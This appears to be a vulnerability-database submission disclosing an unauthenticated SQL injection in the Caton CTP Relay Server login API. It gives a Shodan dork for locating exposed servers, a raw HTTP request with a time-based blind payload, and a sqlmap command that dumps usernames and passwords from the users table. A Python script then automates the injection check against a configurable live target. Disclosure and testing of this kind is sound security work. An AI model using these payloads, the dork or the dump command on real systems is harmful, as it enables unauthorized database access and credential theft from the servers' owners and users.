Submission #116765: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated - Info

Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
Description:
# Exploit Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: unknown
# Shodan Dork: http.favicon.hash:-940032039 title:"Caton CTP Relay Server"

Title:
================
Caton CTP Relay Server unknown version - SQL Injection Unauthenticated

Summary:
================
An unauthenticated SQL injection vulnerability has been found in the Caton CTP Relay Server product, in an unknown version. It allows an attacker to execute arbitrary SQL statements against the application's backing database, which could result in unauthorized disclosure of sensitive information such as user credentials, payment details and other stored data.

The vulnerability is on the system's login page, at the "/server/api/v1/login" endpoint, where users submit their access credentials to log in. The vulnerable parameters are "username" and "password", which are sent as JSON in the body of a POST request. Input supplied in either parameter is placed into the SQL query without proper validation or parameterisation, so an attacker can inject SQL into "username" or "password" and have it executed by the database, for example to retrieve confidential information or to manipulate data.

Note that the endpoint does not require authentication, so anyone who can reach the login API can exploit the issue without valid credentials.
Severity Level:
================
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Affected Product:
================
Caton CTP Relay Server unknown version

Proof of Concept:
================
Request:

POST /server/api/v1/login HTTP/1.1
Host: target
Content-Length: 117
Accept: application/json, text/plain, */*
Accept-Language: en
X-Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json
Origin: http://target
Referer: http://target/login
Accept-Encoding: gzip, deflate
Connection: close

{"username":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR","password":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR"}

SQLMap command:

sqlmap -u 'http://target/server/api/v1/login' --data='{"username":"3xpl","password":"3xpl"}' -p username --risk 3 --level 5 --batch --random-agent --dbms=MySQL --technique=B --threads=10 -D rrsWeb -T users -C username,password --dump
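The PoC above is a time-based blind probe: the injected fragment closes the quoted username, and `XOR(if(now()=sysdate(),sleep(10),0))XOR` makes MySQL pause for ten seconds whenever the expression is actually evaluated, which only happens if the input was concatenated into the query. The script below is an added example, not part of the original submission or of Caton's product, that turns that single request into a repeatable check: it sends a same-shaped baseline (`sleep(0)`) and a delayed probe, and only reports the endpoint as injectable when the fastest probe still beats the slowest baseline by most of the requested delay, so network jitter alone cannot trigger it. The base URL, the round count, the 0.8 ratio and the simulated servers used to run it offline are assumptions of this example; the endpoint, parameter names, payload and the 117-byte body length come from the advisory.

```python
import json
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Endpoint and parameter names are the ones named in the advisory.
LOGIN_PATH = "/server/api/v1/login"
Sender = Callable[[Dict[str, str]], float]


def build_payload(delay: int, marker: str = "3xpl") -> Dict[str, str]:
    """Return the advisory's JSON login body with a configurable sleep() delay.

    The fragment closes the quoted string and appends the MySQL expression
        XOR(if(now()=sysdate(),sleep(N),0))XOR
    now()=sysdate() is always true, so the query pauses N seconds whenever the
    expression is evaluated.  sleep(0) keeps the same query shape without the
    pause, which is a fairer baseline than a plain login attempt.
    """
    injected = f"{marker}'XOR(if(now()=sysdate(),sleep({delay}),0))XOR"
    return {"username": injected, "password": injected}


def encode_body(body: Dict[str, str]) -> bytes:
    """Serialise the body exactly as in the PoC request (no spaces)."""
    return json.dumps(body, separators=(",", ":")).encode()


def make_http_sender(base_url: str, timeout: float = 60.0) -> Sender:
    """Return a sender that POSTs the body to the login API and reports elapsed seconds.

    Standard library only.  A 4xx/5xx reply is still timed: the login is expected
    to be rejected, but by then the query has already run.  base_url is assumed.
    """
    def send(body: Dict[str, str]) -> float:
        req = urllib.request.Request(
            base_url.rstrip("/") + LOGIN_PATH,
            data=encode_body(body),
            method="POST",
            headers={"Content-Type": "application/json", "Accept": "application/json"},
        )
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout):
                pass
        except urllib.error.HTTPError:
            pass
        return time.monotonic() - start
    return send


def make_simulated_sender(honours_sleep: bool, base_latency: float = 0.25) -> Sender:
    """Constructed stand-in for a server so the check can be exercised offline.

    honours_sleep=True models the concatenated-query backend the advisory
    describes (sleep() is evaluated); False models a parameterised login where
    the payload is just an odd username and nothing sleeps.
    """
    def send(body: Dict[str, str]) -> float:
        elapsed = base_latency
        if honours_sleep:
            seconds = body["username"].split("sleep(", 1)[1].split(")", 1)[0]
            elapsed += float(seconds)
        return elapsed
    return send


def time_based_check(send: Sender, delay: int = 10, rounds: int = 3,
                     ratio: float = 0.8) -> Tuple[bool, float, float]:
    """Decide whether the login endpoint is time-based injectable.

    Each round sends a baseline (sleep(0)) and a probe (sleep(delay)).  The
    endpoint is flagged only if the fastest probe exceeds the slowest baseline
    by at least ratio*delay seconds.  Returns (vulnerable, slowest_baseline,
    fastest_probe) so the raw timings can be recorded in the report.
    """
    baselines: List[float] = []
    probes: List[float] = []
    for _ in range(rounds):
        baselines.append(send(build_payload(0)))
        probes.append(send(build_payload(delay)))
    vulnerable = (min(probes) - max(baselines)) >= ratio * delay
    return vulnerable, max(baselines), min(probes)


if __name__ == "__main__":
    # Offline demonstration against the constructed servers; use
    # make_http_sender("http://target") on a real engagement.
    for label, server in (("vulnerable", make_simulated_sender(True)),
                          ("parameterised", make_simulated_sender(False))):
        flagged, base, probe = time_based_check(server, delay=5, rounds=2)
        print(f"{label:13s} injectable={flagged} baseline<={base:.2f}s probe>={probe:.2f}s")
```

Interleaving baseline and probe within each round, rather than sending all baselines first, keeps a load spike on the target from skewing one set of measurements; on a real target, start with a short delay and few rounds, since every probe ties up a database connection for the full sleep.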
Source: ⚠️ ..
User: mrempy (UID 24379)
Submitted: 2023-04-21 07:16 AM (3 years ago)
Moderated: 2023-05-04 05:56 PM (13 days later)
Status: Accepted
VulDB Entry: 228010 [Caton CTP Relay Server 1.2.9 API /server/api/v1/login username/password SQL Injection]
Points: 17
